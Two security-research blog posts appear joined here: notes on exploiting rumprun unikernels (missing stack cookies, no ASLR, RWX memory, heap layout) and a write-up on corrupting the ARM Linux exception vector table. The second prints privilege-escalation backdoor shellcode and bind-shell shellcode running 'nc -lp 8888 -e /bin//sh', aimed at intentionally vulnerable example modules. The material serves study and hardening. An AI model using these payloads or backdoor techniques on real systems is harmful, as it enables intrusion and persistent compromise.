After building rumprun we should have a new compiler, x86_64-rumprun-netbsd-gcc. This is a cross compiler targeting the rumpkernel platform. We can compile as normal x86_64-rumprun-netbsd-gcc hello.c -o hello-rump and in fact the output is an ELF: hello-rump: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped. However, as we obviously cannot directly boot an ELF we must manipulate the executable ('baking' in rumpkernel terms).

Rump kernels provide a rumprun-bake shell script. This script takes an ELF from compiling with the rumprun toolchain and converts it into a bootable image which we can then give to qemu or xen. Continuing in our example: rumprun-bake hw_generic hello.bin hello-rump, where the hw_generic just indicates we are targeting qemu.

Booting and Debugging

At this point assuming you have qemu installed, booting your new image should be as easy as rumprun qemu -g "-curses" -i hello.bin. If everything went according to plan, you should see something like:

hello

Because this is just qemu at this point, if you need to debug you can easily attach via qemu’s system debugger. Additionally, a nice side effect of this toolchain is very easy debugging — you can essentially debug most of your problems on the native architecture, then just switch compilers to build a bootable image. Also, because the boot time is so much faster, debugging and fixing problems is vastly sped up.

If you have further questions, or would like more detail, the Rumpkernel Wiki has some very good documents explaining the various components and options.

Peek/Poke Tool

Initially to develop some familiarity with the code, I wrote a simple peek/poke primitive process. The VM would boot and expose a tcp socket that would allow clients read or write arbitrary memory, as well as wrappers around malloc() and free() to play with the heap state. Most of the knowledge here is derived from this test code, poking at it with a debugger, and reading the rump kernel source.

Memory Protections

One of the benefits of unikernels is you can prune components you might not need. For example, if your unikernel application does not touch the filesystem, that code can be removed from your resulting VM. One interesting consequence of this involves only running one process — because there is only one process running on the VM, there is no need for a virtual memory system to separate address spaces by process.

Right now this means that all memory is read-write-execute. I'm not sure if it's possible to configure the MMU in a hypervisor to enforce memory proections without enabling virtual memory, as most of the virtual memory code I've looked at has been related to process separation with page tables, etc. In any case, currently it’s pretty trivial to introduce new code into the system and there shouldn’t be much need to resort to ROP.

nginx

Nginx was the first target I looked at; I figured I could dig up the stack smash from 2013 (CVE-2013-2028) and use that as a baseline exploit to see what was possible. This ultimately failed, but exposed some interesting things along the way.

Reason Why This Doesn’t Work

CVE-2013-2028 is a stack buffer overflow in the nginx handler for chunked requests. I thought this would be a good test as the user controls much of the data on the stack, however, various attempts to trigger the overflow failed. Running the VM in a debugger you could see the bug was not triggered despite the size value being large enough. In fact, the syscall returned an error.

It turns out however that NetBSD has code to prevent against this inside the kernel:

do_sys_recvmsg_so(struct lwp *l, int s, struct socket *so, struct msghdr *mp,
        struct mbuf **from, struct mbuf **control, register_t *retsize) {
// …
        if (tiov->iov_len > SSIZE_MAX || auio.uio_resid > SSIZE_MAX) {
            error = EINVAL;
            goto out;
        }
// …

iov_len is our recv() size parameter, so this bug is dead in the water. As an aside, this also made me wonder how Linux applications would respond if you passed a size greater than LONG_MAX into recv() and it succeeded…

Something Interesting

Traditionally when exploiting this bug one has to worry about stack cookies. Nginx has a worker pool of processes forked from the main process. In the event of a crash, a new process will be forked from the parent, meaning that the stack cookie will remain constant across subsequent connections. This allows you to break it down into four, 1 byte brute forces as opposed to one 4 byte, meaning it can be done in a maximum of 1024 connections. However, inside the unikernel, there is only one process — if a process crashes the entire VM must be restarted, and because the only process is the kernel, the stack cookie should (in theory) be regenerated. Looking at the disassembled nginx code, you can see the stack cookie checks in all off the relevant functions.

In practice, the point is moot because the stack cookies are always zero. The compiler creates and checks the cookies, it just never populates fs:0x28 (the location of the cookie value), so it’s always a constant value and assuming you can write null bytes, this should pose no problem.

ASLR

I was curious if unikernels would implement some form of ASLR, as during the build process they get compiled to an ELF (which is quite nice for analysis!) which might make position independent code easier to deal with. They don’t: all images are loaded at 0x100000. There is however "natures ASLR" as these images aren’t distributed in binary form. Thus, as everyone must compile their own images, these will vary slightly depending on compiler version, software version, etc. However, even this constraint gets made easier. If you look at the format of the loaded images, they look something like this:

0x100000: <unikernel init code>
…
0x110410: <application code starts>

This means across any unikernel application you’ll have approximately 0x10000 bytes of fixed value, fixed location executable memory. If you find an exploitable bug it should be possible to construct a payload entirely from the code in this section. This payload could be used to leak the application code, install persistence, whatever.

PHP

Once nginx was off the table, I needed another application that had a rumpkernel package and a history of exploitable bugs. The PHP interpreter fits the bill. I ended up using Sean Heelan's PHP bug #70068, because of the provided trigger in the bug description, and detailed description explaining the bug. Rather than try to poorly recap Sean's work, I'd encourage you to just read the inital report if you're curious about the bug.

In retrospect, I took a poor exploitation path for this bug. Because the heap slabs have no ASLR, you can fairly confidently predict mapped addresses inside the PHP interpreter. Furthermore, by controlling the size of the payload, you can determine which bucket it will fall into and pick a lesser used bucket for more stability. This allows you to be lazy, and hard code payload addresses, leading to easy exploitation. This works very well -- I was basically able to take Sean's trigger, slap some addresses and a payload into it, and get code exec out of it. However, the downsides to this approach quickly became apparent. When trying to return from my payload and leave the interpreter in a sane state (as in, running) I realized that I would need to actually understand the PHP heap to repair it. I started this process by examining the rump heap (see below), but got bored when I ended up in the PHP heap.

Persistence

This was the portion I wanted to finish for EkoParty, and it didn’t get done. In theory, as all memory is read-write-execute, it should be pretty trivial to just patch recv() or something to inspect the data received, and if matching some constant execute the rest of the packet. This is strictly in memory, anything touching disk will be application specific.

Assuming your payload is stable, you should be able to install an in-memory backdoor which will persist for the runtime of that session (and be deleted on poweroff). While in many configurations there is no writable persistent storage which will survive reboots this is not true for all unikernels (e.g. mysql). In those cases it might be possible to persist across power cycles, but this will be application specific.

One final, and hopefully obvious note: one of the largest differences in exploitation of unikernels is the lack of multiple processes. Exploits frequently use the existence of multiple processes to avoid cleaning up application state after a payload is run. In a unikernel, your payload must repair application state or crash the VM. In this way it is much more similar to a kernel exploit.

Heap Notes

The unikernel heap is quite nice from an exploitation perspective. It's a slab-style allocator with in-line metadata on every block. Specifically, the metadata contains the ‘bucket’ the allocation belongs to (and thus the freelist the block should be released to). This means a relative overwrite plus free()ing into a smaller bucket should allow for fairly fine grained control of contents. Additionally the heap is LIFO, allowing for standard heap massaging.

Also, while kinda untested, I believe rumpkernel applications are compiled without QUEUEDEBUG defined. This is relevant as the sanity checks on unlink operations ("safe unlink") require this to be defined. This means that in some cases, if freelists themselves can be overflown then removed you can get a write-what-where. However, I think this is fairly unlikely in practice, and with the lack of memory protections elsewhere, I'd be surprised if it would currently be useful.

You can find most of the relevant heap source here

Symbol Resolution

Rumpkernels helpfully include an entire syscall table under the mysys symbol. When rumpkernel images get loaded, the ELF header gets stripped, but the rest of the memory is loaded contigiously:

gef➤  info file
Symbols from "/home/x/rumprun-packages/php5/bin/php.bin".
Remote serial target in gdb-specific protocol:
Debugging a target over a serial line.
        While running this, GDB does not access memory from...
Local exec file:
        `/home/x/rumprun-packages/php5/bin/php.bin', file type elf64-x86-64.
        Entry point: 0x104000
        0x0000000000100000 - 0x0000000000101020 is .bootstrap
        0x0000000000102000 - 0x00000000008df31c is .text
        0x00000000008df31c - 0x00000000008df321 is .init
        0x00000000008df340 - 0x0000000000bba9f0 is .rodata
        0x0000000000bba9f0 - 0x0000000000cfbcd0 is .eh_frame
        0x0000000000cfbcd0 - 0x0000000000cfbd28 is link_set_sysctl_funcs
        0x0000000000cfbd28 - 0x0000000000cfbd50 is link_set_bufq_strats
        0x0000000000cfbd50 - 0x0000000000cfbde0 is link_set_modules
        0x0000000000cfbde0 - 0x0000000000cfbf18 is link_set_rump_components
        0x0000000000cfbf18 - 0x0000000000cfbf60 is link_set_domains
        0x0000000000cfbf60 - 0x0000000000cfbf88 is link_set_evcnts
        0x0000000000cfbf88 - 0x0000000000cfbf90 is link_set_dkwedge_methods
        0x0000000000cfbf90 - 0x0000000000cfbfd0 is link_set_prop_linkpools
        0x0000000000cfbfd0 - 0x0000000000cfbfe0 is .initfini
        0x0000000000cfc000 - 0x0000000000d426cc is .data
        0x0000000000d426d0 - 0x0000000000d426d8 is .got
        0x0000000000d426d8 - 0x0000000000d426f0 is .got.plt
        0x0000000000d426f0 - 0x0000000000d42710 is .tbss
        0x0000000000d42700 - 0x0000000000e57320 is .bss

This means you should be able to just run simple linear scan, looking for the mysys table. A basic heuristic should be fine, 8 byte syscall number, 8 byte address. In the PHP5 interpreter, this table has 67 entries, giving it a big, fat footprint:

gef➤  x/6g mysys
0xaeea60 <mysys>:       0x0000000000000003      0x000000000080b790 -- <sys_read>
0xaeea70 <mysys+16>:    0x0000000000000004      0x000000000080b9d0 -- <sys_write>
0xaeea80 <mysys+32>:    0x0000000000000006      0x000000000080c8e0 -- <sys_close>
...

There is probably a chain of pointers in the initial constant 0x10410 bytes you could also follow, but this approach should work fine.

Hypervisor fuzzing

After playing with these for a while, I had another idea: rather than using unikernels to host userland services, I think there is a really cool opportunity to write a hypervisor fuzzer in a unikernel. Consider: You have all the benefits of a POSIX userland only you’re in ring0. You don’t need to export your data to userland to get easy and familiar IO functions. Unikernels boot really, really fast. As in under 1 second. This should allow for pretty quick state clearing.

This is definitely an area of interesting future work I’d like to come back to.

Final Suggestions

If you develop unikernels:

  • Populate the randomness for stack cookies.
  • Load at a random location for some semblance of ASLR.
  • Is there a way you can enforce memory permissions? Some form of NX would go a long way.
  • If you can’t, some control flow integrity stuff might be a good idea? Haven’t really thought this through or tried it.
  • Take as many lessons from grsec as possible.

If you’re exploiting unikernels:

  • Have fun.

If you’re exploiting hypervisors:

  • Unikernels might provide a cool platform to easily play in ring0.

Thanks

For feedback, bugs used, or editing @seanhn, @hugospns, @0vercl0k, @darkarnium, other quite helpful anonymous types.

Corrupting the ARM Exception Vector Table

Introduction

A few months ago, I was writing a Linux kernel exploitation challenge on ARM in an attempt to learn about kernel exploitation and I thought I'd explore things a little. I chose the ARM architecture mainly because I thought it would be fun to look at. This article is going to describe how the ARM Exception Vector Table (EVT) can aid in kernel exploitation in case an attacker has a write what-where primitive. It will be covering a local exploit scenario as well as a remote exploit scenario. Please note that corrupting the EVT has been mentioned in the paper "Vector Rewrite Attack"[1], which briefly talks about how it can be used in NULL pointer dereference vulnerabilities on an ARM RTOS.

The article is broken down into two main sections. First a brief description of the ARM EVT and its implications from an exploitation point of view (please note that a number of things about the EVT will be omitted to keep this article relatively short). We will go over two examples showing how we can abuse the EVT.

I am assuming the reader is familiar with Linux kernel exploitation and knows some ARM assembly (seriously).

ARM Exceptions and the Exception Vector Table

In a few words, the EVT is to ARM what the IDT is to x86. In the ARM world, an exception is an event that causes the CPU to stop or pause from executing the current set of instructions. When this exception occurs, the CPU diverts execution to another location called an exception handler. There are 7 exception types and each exception type is associated with a mode of operation. Modes of operation affect the processor's "permissions" in regards to system resources. There are in total 7 modes of operation. The following table maps some exception types to their associated modes of operation:

Exception                   |       Mode            |     Description
----------------------------|-----------------------|-------------------------------------------------------------------
Fast Interrupt Request      |      FIQ              |   interrupts requiring fast response and low latency.
Interrupt Request           |      IRQ              |   used for general-purpose interrupt handling.
Software Interrupt or RESET |      Supervisor Mode  |   protected mode for the operating system.
Prefetch or Data Abort      |      Abort Mode       |   when fetching data or an instruction from invalid/unmmaped memory.
Undefined Instruction       |      Undefined Mode   |   when an undefined instruction is executed.

The other two modes are User Mode which is self explanatory and System Mode which is a privileged user mode for the operating system

The Exceptions

The exceptions change the processor mode and each exception has access to a set of banked registers. These can be described as a set of registers that exist only in the exception's context so modifying them will not affect the banked registers of another exception mode. Different exception modes have different banked registers:

Banked Registers

The Exception Vector Table

The vector table is a table that actually contains control transfer instructions that jump to the respective exception handlers. For example, when a software interrupt is raised, execution is transfered to the software interrupt entry in the table which in turn will jump to the syscall handler. Why is the EVT so interesting to target? Well because it is loaded at a known address in memory and it is writeable* and executable. On 32-bit ARM Linux this address is 0xffff0000. Each entry in the EVT is also at a known offset as can be seen on the following table:

Exception                   |       Address            
----------------------------|-----------------------
Reset                       |      0xffff0000           
Undefined Instruction       |      0xffff0004       
SWI                         |      0xffff0008  
Prefetch Abort              |      0xffff000c       
Data Abort                  |      0xffff0010 
Reserved                    |      0xffff0014  
IRQ                         |      0xffff0018   
FIQ                         |      0xffff001c  

A note about the Undefined Instruction exception

Overwriting the Undefiend Instruction vector seems like a great plan but it actually isn't because it is used by the kernel. Hard float and Soft float are two solutions that allow emulation of floating point instructions since a lot of ARM platforms do not have hardware floating point units. With soft float, the emulation code is added to the userspace application at compile time. With hard float, the kernel lets the userspace application use the floating point instructions as if the CPU supported them and then using the Undefined Instruction exception, it emulates the instruction inside the kernel.

If you want to read more on the EVT, checkout the references at the bottom of this article, or google it.

Corrupting the EVT

There are few vectors we could use in order to obtain privileged code execution. Clearly, overwriting any vector in the table could potentially lead to code execution, but as the lazy people that we are, let's try to do the least amount of work. The easiest one to overwrite seems to be the Software Interrupt vector. It is executing in process context, system calls go through there, all is well. Let's now go through some PoCs/examples. All the following examples have been tested on Debian 7 ARMel 3.2.0-4-versatile running in qemu.

Local scenario

The example vulnerable module implements a char device that has a pretty blatant arbitrary-write vulnerability( or is it a feature?):

// called when 'write' system call is done on the device file
static ssize_t on_write(struct file *filp,const char *buff,size_t len,loff_t *off)
{
    size_t siz = len;
    void * where = NULL;
    char * what = NULL;

    if(siz > sizeof(where))
        what = buff + sizeof(where);
    else
        goto end;

    copy_from_user(&where, buff, sizeof(where));
    memcpy(where, what, sizeof(void *));

end:
    return siz;
}

Basically, with this cool and realistic vulnerability, you give the module an address followed by data to write at that address. Now, our plan is going to be to backdoor the kernel by overwriting the SWI exception vector with code that jumps to our backdoor code. This code will check for a magic value in a register (say r7 which holds the syscall number) and if it matches, it will elevate the privileges of the calling process. Where do we store this backdoor code ? Considering the fact that we have an arbitrary write to kernel memory, we can either store it in userspace or somewhere in kernel space. The good thing about the latter choice is that if we choose an appropriate location in kernel space, our code will exist as long as the machine is running, whereas with the former choice, as soon as our user space application exits, the code is lost and if the entry in the EVT isn't set back to its original value, it will most likely be pointing to invalid/unmmapped memory which will crash the system. So we need a location in kernel space that is executable and writeable. Where could this be ? Let's take a closer look at the EVT:

EVT Disassembly

As expected we see a bunch of control transfer instructions but one thing we notice about them is that "closest" referenced address is 0xffff0200. Let's take a look what is between the end of the EVT and 0xffff0200:
EVT Inspection

It looks like nothing is there so we have around 480 bytes to store our backdoor which is more than enough.

The Exploit

Recapitulating our exploit:
1. Store our backdoor at 0xffff0020.
2. Overwrite the SWI exception vector with a branch to 0xffff0020.
3. When a system call occurs, our backdoor will check if r7 == 0xb0000000 and if true, elevate the privileges of the calling process otherwise jump to the normal system call handler.
Here is the backdoor's code:

;check if magic
    cmp     r7, #0xb0000000
    bne     exit

elevate:
    stmfd   sp!,{r0-r12}

    mov     r0, #0
    ldr     r3, =0xc0049a00     ;prepare_kernel_cred
    blx     r3
    ldr     r4, =0xc0049438     ;commit_creds
    blx     r4

    ldmfd   sp!, {r0-r12, pc}^  ;return to userland

;go to syscall handler
exit:
    ldr     pc, [pc, #980]      ;go to normal swi handler

You can find the complete code for the vulnerable module and the exploit here. Run the exploit:

Local PoC

Remote scenario

For this example, we will use a netfilter module with a similar vulnerability as the previous one:

if(ip->protocol == IPPROTO_TCP){
    tcp = (struct tcphdr *)(skb_network_header(skb) + ip_hdrlen(skb));
    currport = ntohs(tcp->dest);
    if((currport == 9999)){
        tcp_data = (char *)((unsigned char *)tcp + (tcp->doff * 4));
        where = ((void **)tcp_data)[0];
        len = ((uint8_t *)(tcp_data + sizeof(where)))[0];
        what = tcp_data + sizeof(where) + sizeof(len);
        memcpy(where, what, len);
    }
}

Just like the previous example, this module has an awesome feature that allows you to write data to anywhere you want. Connect on port tcp/9999 and just give it an address, followed by the size of the data and the actual data to write there. In this case we will also backdoor the kernel by overwriting the SWI exception vector and backdooring the kernel. The code will branch to our shellcode which we will also, as in the previous example, store at 0xffff020. Overwriting the SWI vector is especially a good idea in this remote scenario because it will allow us to switch from interrupt context to process context. So our backdoor will be executing in a context with a backing process and we will be able to "hijack" this process and overwrite its code segment with a bind shell or connect back shell. But let's not do it that way. Let's check something real quick:

cat /proc/self/maps

Would you look at that, on top of everything else, the EVT is a shared memory segment. It is executable from user land and writeable from kernel land*. Instead of overwriting the code segment of a process that is making a system call, let's just store our code in the EVT right after our first stage and just return there. Every system call goes through the SWI vector so we won't have to wait too much for a process to get caught in our trap.

The Exploit

Our exploit goes:
1. Store our first stage and second stage shellcodes at 0xffff0020 (one after the other).
2. Overwrite the SWI exception vector with a branch to 0xffff0020.
3. When a system call occurs, our first stage shellcode will set the link register to the address of our second stage shellcode (which is also stored in the EVT and which will be executed from userland), and then return to userland.
4. The calling process will "resume execution" at the address of our second stage which is just a bind shell.

Here is the stage 1-2 shellcode:

stage_1:
    adr     lr, stage_2
    push    {lr}
    stmfd   sp!, {r0-r12}
    ldr     r0, =0xe59ff410     ; intial value at 0xffff0008 which is
                                ; ldr     pc, [pc, #1040] ; 0xffff0420
    ldr     r1, =0xffff0008
    str     r0, [r1]
    ldmfd   sp!, {r0-r12, pc}^  ; return to userland

stage_2:
    ldr     r0, =0x6e69622f     ; /bin
    ldr     r1, =0x68732f2f     ; /sh
    eor     r2, r2, r2          ; 0x00000000
    push    {r0, r1, r2}
    mov     r0, sp

    ldr     r4, =0x0000632d     ; -c\x00\x00
    push    {r4}
    mov     r4, sp

    ldr     r5, =0x2d20636e
    ldr     r6, =0x3820706c
    ldr     r7, =0x20383838     ; nc -lp 8888 -e /bin//sh
    ldr     r8, =0x2f20652d
    ldr     r9, =0x2f6e6962
    ldr     r10, =0x68732f2f

    eor     r11, r11, r11
    push    {r5-r11}
    mov     r5, sp
    push    {r2}

    eor     r6, r6, r6
    push    {r0,r4,r5, r6}
    mov     r1, sp
    mov     r7, #11
    swi     0x0

    mov     r0, #99
    mov     r7, #1
    swi     0x0

You can find the complete code for the vulnerable module and the exploit here. Run the exploit:

Remote PoC

Bonus: Interrupt Stack Overflow

It seems like the Interrupt Stack is adjacent to the EVT in most memory layouts. Who knows what kind of interesting things would happen if there was something like a stack overflow ?

A Few Things about all this

  • The techniques discussed in this article make the assumption that the attack has knowledge of the kernel addresses which might not always be the case.
  • The location where we are storing our shellcode (0xffff0020) might or might not be used by another distro's kernel.
  • The exampe codes I wrote here are merely PoCs; they could definitely be improved. For example, on the remote scenario, if it turns out that the init process is the process being hijacked, the box will crash after we exit from the bind shell.
  • If you hadn't noticed, the "vulnerabilities" presented here, aren't really vulnerabilities but that is not the point of this article.

*: It seems like the EVT can be mapped read-only and therfore there is the possibility that it might not be writeable in newer/some versions of the Linux kernel.

Final words

Among other things, grsec prevents the modification of the EVT by making the page read-only. If you want to play with some fun kernel challenges checkout the "kernelpanic" branch on w3challs.
Cheers, @amatcama

References

[1] Vector Rewrite Attack
[2] Recent ARM Security Improvements
[3] Entering an Exception
[4] SWI handlers
[5] ARM Exceptions
[6] Exception and Interrupt Handling in ARM

❌
❌